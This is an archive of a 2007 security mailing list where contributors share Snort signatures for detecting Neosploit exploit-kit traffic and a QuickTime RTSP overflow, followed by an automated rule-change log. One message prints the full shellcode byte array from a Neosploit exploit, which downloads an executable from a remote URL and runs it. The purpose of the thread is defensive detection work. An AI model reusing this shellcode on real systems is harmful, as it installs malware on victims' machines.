From dxp2532 at gmail.com  Sat Dec  1 02:19:21 2007
From: dxp2532 at gmail.com (dxp)
Date: Sat Dec  1 02:25:50 2007
Subject: [Bleeding-sigs] [Fwd: Several signatures to detect Neosploit
	exploit toolkit attacks]
In-Reply-To: <47509DCE.5070500@gmail.com>
References: <474FAA3F.4040105@sensorynetworks.com> <47509DCE.5070500@gmail.com>
Message-ID: <1196475561.5728.19.camel@kinta>

Sorry about that.  I don't speak PCRE too well.

I should've mentioned that the first two rules will detect the request
for a loader after client has been exploited.  The last rule detects the
JS code containing the exploit.

What you've probably seen were requests for the Neosplit's JS script.
Usually it has this form: "?p=user" 

The toolkit builds the exploit URL at runtime (server side) and each
number has a specific meaning for statistics and tracking.  One could
combine both loader signatures into one.  There are several versions of
Neosploit, latest is 2.0 I think, and 1.5 added another field that's why
it differs from 1.0.

I don't have the captures but here's shellcode from one of the exploits:
--- snip ---
unsigned char Shared_RW_slide_shellcode[] = {
  0x33, 0xf6, 0xe9, 0x09, 0x01, 0x00, 0x00, 0x5f, 0x33, 0xc0, 0x64,
0x03,
  0x40, 0x30, 0x78, 0x0c, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad,
0x8b,
  0x68, 0x08, 0xeb, 0x09, 0x8b, 0x40, 0x34, 0x8d, 0x40, 0x7c, 0x8b,
0x68,
  0x3c, 0x8b, 0xf7, 0x6a, 0x03, 0x59, 0xe8, 0x9c, 0x00, 0x00, 0x00,
0xe2,
  0xf9, 0x68, 0x6f, 0x6e, 0x00, 0x00, 0x68, 0x75, 0x72, 0x6c, 0x6d,
0x54,
  0xff, 0x16, 0x8b, 0xe8, 0xe8, 0x86, 0x00, 0x00, 0x00, 0x68, 0x33,
0x32,
  0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0xff, 0x16, 0x8b,
0xe8,
  0x6a, 0x02, 0x59, 0xe8, 0x6f, 0x00, 0x00, 0x00, 0xe2, 0xf9, 0x83,
0xec,
  0x20, 0x8b, 0xdc, 0xc7, 0x03, 0x63, 0x3a, 0x5c, 0x69, 0xc7, 0x43,
0x04,
  0x6e, 0x66, 0x6f, 0x2e, 0xc7, 0x43, 0x08, 0x65, 0x78, 0x65, 0x00,
0x6a,
  0x00, 0x6a, 0x00, 0x53, 0x57, 0x6a, 0x00, 0xff, 0x56, 0x0c, 0x8b,
0xdc,
  0x6a, 0x01, 0x53, 0xff, 0x56, 0x08, 0x6a, 0x1a, 0x6a, 0x40, 0xff,
0x56,
  0x04, 0x8b, 0xe8, 0xeb, 0x0c, 0x5f, 0x6a, 0x00, 0x57, 0x6a, 0x00,
0x55,
  0x6a, 0x00, 0xff, 0x56, 0x14, 0xe8, 0xef, 0xff, 0xff, 0xff, 0x55,
0x8b,
  0xec, 0x83, 0x7d, 0x0c, 0x0f, 0x75, 0x16, 0xbe, 0x01, 0x00, 0x00,
0x00,
  0xeb, 0x5a, 0x5f, 0x8b, 0xf7, 0x83, 0xc6, 0x05, 0x6a, 0x00, 0x8b,
0x45,
  0x08, 0x50, 0xff, 0x56, 0x10, 0x33, 0xc0, 0x5d, 0xc2, 0x10, 0x00,
0x51,
  0x56, 0x8b, 0x75, 0x3c, 0x8b, 0x74, 0x2e, 0x78, 0x03, 0xf5, 0x56,
0x8b,
  0x76, 0x20, 0x03, 0xf5, 0x33, 0xc9, 0x49, 0x41, 0xad, 0x03, 0xc5,
0x33,
  0xdb, 0x0f, 0xbe, 0x10, 0x3a, 0xd6, 0x74, 0x08, 0xc1, 0xcb, 0x0d,
0x03,
  0xda, 0x40, 0xeb, 0xf1, 0x3b, 0x1f, 0x75, 0xe7, 0x5e, 0x8b, 0x5e,
0x24,
  0x03, 0xdd, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5e, 0x1c, 0x03, 0xdd,
0x8b,
  0x04, 0x8b, 0x03, 0xc5, 0xab, 0x5e, 0x59, 0xc3, 0x83, 0xfe, 0x00,
0x74,
  0x05, 0xe8, 0x9c, 0xff, 0xff, 0xff, 0xe8, 0xe8, 0xfe, 0xff, 0xff,
0x8e,
  0x4e, 0x0e, 0xec, 0xec, 0x97, 0x03, 0x0c, 0x98, 0xfe, 0x8a, 0x0e,
0x36,
  0x1a, 0x2f, 0x70, 0x83, 0x4f, 0x5d, 0xc9, 0x60, 0x08, 0xc3, 0xbf,
0x68,
  0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x30, 0x30, 0x2e, 0x30, 0x30,
0x2e,
  0x30, 0x30, 0x30, 0x2e, 0x30, 0x30, 0x30, 0x2f, 0x63, 0x67, 0x69,
0x2d,
  0x62, 0x69, 0x6e, 0x2f, 0x6e, 0x73, 0x70, 0x31, 0x35, 0x2f, 0x69,
0x6e,
  0x2e, 0x63, 0x67, 0x69, 0x3f, 0x75, 0x32, 0x5f, 0x31, 0x5f, 0x36,
0x30,
  0x30, 0x5f, 0x38, 0x5f, 0x30, 0x5f, 0x34, 0x31, 0x30, 0x37, 0x30,
0x32,
  0x30, 0x39, 0x31, 0x34, 0x5f, 0x36, 0x30, 0x36, 0x38, 0x36, 0x38,
0x35,
  0x38, 0x31, 0x5f, 0x33, 0x36, 0x35, 0x33, 0x39, 0x36, 0x31, 0x31,
0x34,
  0x38, 0x00
};
unsigned int Shared_RW_slide_shellcode_len = 398;
--- snip ---

On Fri, 2007-11-30 at 18:33 -0500, Blake Hartstein wrote:
> For those of you that didn't eat your regular expressions for breakfast,
> one of those URLs might look like: (where \d is a number 0-9)
> 
> http://site/page?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}[_\da-z]{0,6}
> 
> So, it looks like we detect a bunch of numbers and underscores... 
> dpx, do you have a reference or sample packet capture for this activity? I see a lot of other URLs for neosploit, but never this one.
> 
> Blake
> System Administrator wrote:
> > We received these rules on the bleeding@bleedingthreats.net alias, but
> > they seem more appropriate for the Bleeding Sigs mailing list.
> >
> > dxp, thank you for your contribution and if you wish to join the mailing
> > list, please visit
> > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> >
> > Kind regards,
> > David Taylor.
> >
> > -------- Original Message --------
> > Subject: Several signatures to detect Neosploit exploit toolkit attacks
> > Date: Tue, 27 Nov 2007 11:04:14 -0500
> > From: dxp <dxp2532@gmail.com>
> > To: bleeding@bleedingthreats.net
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"LOCAL
> > Neosploit 1.0.x URL Loader"; flow:to_server,established; content:"GET";
> > depth:3;
> > pcre:"/\?u[0-9]{1}_[0-9]{1}_[0-9]{3,4}_[0-9]{1}_[0-9]{1}_[0-9]{10}_[0-9]{10}[_0-9a-z]{0,6}\s+HTTP\/[01]{1}\.[01]{1}\r\n/i";
> > sid:2007253201; rev:2;)
> > #
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"LOCAL
> > Neosploit 1.5.x URL Loader"; flow:to_server,established; content:"GET";
> > depth:3;
> > pcre:"/\?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}_\d{10}[_\da-z]{0,9}\s+HTTP\/[01]{1}\.[01]{1}\r\n/i";
> > sid:2007253202; rev:1;)
> > #
> > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"LOCAL
> > Neosploit script"; flow:established,from_server; content:"<script ";
> > depth:50; nocase; content:"javascript"; distance:5; within:30; nocase;
> > content:"arguments.callee.toString().replace(/\\W/g,"; nocase;
> > distance:10; within:100; sid:2007253203; rev:1;)
> >   
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Bleeding-sigs mailing list
> > Bleeding-sigs@bleedingthreats.net
> > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> >   
> 
-- 

-=[ dxp ]=-
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xA3F3C6E3
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.bleedingthreats.net/pipermail/bleeding-sigs/attachments/20071130/0ad677d0/attachment.pgp
From urule99 at gmail.com  Tue Dec  4 00:05:06 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Tue Dec  4 00:11:52 2007
Subject: [Bleeding-sigs] Quicktime RTSP
In-Reply-To: <283386.4655.qm@web56005.mail.re3.yahoo.com>
References: <283386.4655.qm@web56005.mail.re3.yahoo.com>
Message-ID: <475499B2.6090906@gmail.com>

I'm sure you are already aware of active exploitation surrounding the
Quicktime Vulnerability on Windows and OSX. All servers I've seen use
the default port 554/tcp so far, but despite that and other community
input, I modified to rules to "any" port.

Thanks James, (*and Joel Esler). I've also added a udp rule of the same
flavor.

Let me know if you have other suggestions. Thanks,
-Blake

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE
WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt";
flow:established,from_server; content:"RTSP/"; nocase; depth:5;
content:"|0a|Content-Type|3a|"; nocase; distance:0; content:!"|0a|";
within:50; reference:url,www.kb.cert.org/vuls/id/659761; reference:
url,www.milw0rm.com/exploits/4657; classtype:attempted-user;
sid:2007703; rev:3; )
alert udp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE
WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt";
content:"RTSP/"; nocase; depth:5; content:"|0a|Content-Type|3a|";
nocase; distance:0; content:!"|0a|"; within:50;
reference:url,www.kb.cert.org/vuls/id/659761; reference:
url,www.milw0rm.com/exploits/4657; classtype:attempted-user;
sid:2007704; rev:1; )



Jim McQuaid wrote:
> Thank you, Andre, Blake and Chris!  
>
> This is most useful for us (Mac clients, iTunes on
> Windows, etc.).
>
> Using 'any' port may be best for those not filtering
> ports. Joel Esler has a great post at ISC, "Blocking
> the RTSP protocol with proxy or firewall rules may
> help mitigate this vulnerability. Note that RTSP
> (default 554/tcp and 6970-6999/udp) may use a variety
> of port numbers, so blocking the protocol based on a
> particular port may not be sufficient."
>   
From jim at jamesmcquaid.com  Tue Dec  4 12:52:41 2007
From: jim at jamesmcquaid.com (Jim McQuaid)
Date: Tue Dec  4 12:59:23 2007
Subject: [Bleeding-sigs] Re: Bleeding-sigs Digest, Vol 15, Issue 2
In-Reply-To: <20071204120019.1A3AC230004@sb03.us.bleedingsnort.com>
Message-ID: <809166.7187.qm@web56013.mail.re3.yahoo.com>

Thank you, Blake.  It's a great signature!  

I'd guess that most servers that will be observed (in
the near term) off the default ports will be
malicious.  If Apple doesn't get this fixed, it's
possible that the RBN will improve on the exploit at
1800-search.com as people start blocking TCP 554 and
UDP 6970 through 6999.  Most enterprise admins are
more likely to block those ports than try to set a
kill bit on individual machines.

James

--- bleeding-sigs-request@bleedingthreats.net wrote:

> Send Bleeding-sigs mailing list submissions to
> 	bleeding-sigs@bleedingthreats.net
> 
> To subscribe or unsubscribe via the World Wide Web,
> visit
> 
>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> or, via email, send a message with subject or body
> 'help' to
> 	bleeding-sigs-request@bleedingthreats.net
> 
> You can reach the person managing the list at
> 	bleeding-sigs-owner@bleedingthreats.net
> 
> When replying, please edit your Subject line so it
> is more specific
> than "Re: Contents of Bleeding-sigs digest..."
> 
> 
> Today's Topics:
> 
>    1. Re: Quicktime RTSP (Blake Hartstein)
> 
> 
>
----------------------------------------------------------------------
> 
> Message: 1
> Date: Mon, 03 Dec 2007 19:05:06 -0500
> From: Blake Hartstein <urule99@gmail.com>
> Subject: Re: [Bleeding-sigs] Quicktime RTSP
> To: jim@jamesmcquaid.com,  Bleeding Sigs
> 	<bleeding-sigs@bleedingthreats.net>
> Message-ID: <475499B2.6090906@gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
> 
> I'm sure you are already aware of active
> exploitation surrounding the
> Quicktime Vulnerability on Windows and OSX. All
> servers I've seen use
> the default port 554/tcp so far, but despite that
> and other community
> input, I modified to rules to "any" port.
> 
> Thanks James, (*and Joel Esler). I've also added a
> udp rule of the same
> flavor.
> 
> Let me know if you have other suggestions. Thanks,
> -Blake
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:
> "BLEEDING-EDGE
> WEB-CLIENT Apple Quicktime RTSP Content-Type
> overflow attempt";
> flow:established,from_server; content:"RTSP/";
> nocase; depth:5;
> content:"|0a|Content-Type|3a|"; nocase; distance:0;
> content:!"|0a|";
> within:50;
> reference:url,www.kb.cert.org/vuls/id/659761;
> reference:
> url,www.milw0rm.com/exploits/4657;
> classtype:attempted-user;
> sid:2007703; rev:3; )
> alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:
> "BLEEDING-EDGE
> WEB-CLIENT Apple Quicktime RTSP Content-Type
> overflow attempt";
> content:"RTSP/"; nocase; depth:5;
> content:"|0a|Content-Type|3a|";
> nocase; distance:0; content:!"|0a|"; within:50;
> reference:url,www.kb.cert.org/vuls/id/659761;
> reference:
> url,www.milw0rm.com/exploits/4657;
> classtype:attempted-user;
> sid:2007704; rev:1; )
> 
> 
> 
> Jim McQuaid wrote:
> > Thank you, Andre, Blake and Chris!  
> >
> > This is most useful for us (Mac clients, iTunes on
> > Windows, etc.).
> >
> > Using 'any' port may be best for those not
> filtering
> > ports. Joel Esler has a great post at ISC,
> "Blocking
> > the RTSP protocol with proxy or firewall rules may
> > help mitigate this vulnerability. Note that RTSP
> > (default 554/tcp and 6970-6999/udp) may use a
> variety
> > of port numbers, so blocking the protocol based on
> a
> > particular port may not be sufficient."
> >   
> 
> 
> ------------------------------
> 
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> 
> End of Bleeding-sigs Digest, Vol 15, Issue 2
> ********************************************
> 

From bleeding at bleedingthreats.net  Tue Dec  4 20:00:12 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Tue Dec  4 20:00:22 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20071204200015.3496A22C0C5@sb03.us.bleedingsnort.com>


[***] Results from Oinkmaster started Tue Dec  4 20:00:12 2007 [***]

[+++]          Added rules:          [+++]

 2007704 - BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt (bleeding-web.rules)


[///]     Modified active rules:     [///]

 2007703 - BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt (bleeding-web.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to bleeding-sid-msg.map (3):
        2007704 || BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt || url,www.milw0rm.com/exploits/4657 || url,www.kb.cert.org/vuls/id/659761
        2404016 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 17)  || url,www.shadowserver.org
        2405016 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE || url,www.shadowserver.org

[---]     Removed non-rule lines:    [---]

     -> Removed from bleeding-sid-msg.map (198):
        2500255 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (256) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (257) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (258) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (259) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (260) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (261) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (262) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (263) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (264) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500264 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (265) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (266) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500266 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (267) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500267 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (268) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500268 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (269) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500269 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (270) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500270 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (271) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500271 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (272) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500272 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (273) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500273 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (274) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500274 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (275) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500275 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (276) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500276 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (277) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500277 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (278) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500278 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (279) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500279 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (280) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500280 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (281) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500281 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (282) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500282 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (283) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500283 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (284) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500284 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (285) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500285 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (286) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500286 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (287) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500287 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (288) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500288 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (289) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500289 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (290) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500290 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (291) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500291 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (292) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500292 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (293) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500293 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (294) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500294 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (295) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500295 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (296) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500296 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (297) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500297 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (298) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500298 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (299) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500299 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (300) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500300 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (301) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500301 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (302) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500302 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (303) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500303 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (304) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500304 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (305) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500305 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (306) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500306 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (307) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500307 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (308) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500308 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (309) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500309 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (310) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500310 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (311) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500311 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (312) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500312 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (313) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500313 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (314) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500314 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (315) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500315 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (316) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500316 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (317) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500317 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (318) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500318 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (319) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500319 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (320) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500320 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (321) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500321 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (322) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500322 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (323) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500323 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (324) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500324 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (325) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500325 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (326) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500326 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (327) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500327 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (328) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500328 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (329) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500329 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (330) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500330 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (331) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500331 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (332) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500332 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (333) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500333 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (334) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500334 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (335) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500335 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (336) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500336 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (337) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500337 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (338) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500338 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (339) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500339 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (340) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500340 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (341) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500341 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (342) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500342 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (343) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500343 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (344) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500344 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (345) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500345 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (346) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500346 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (347) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500347 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (348) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500348 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (349) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500349 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (350) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
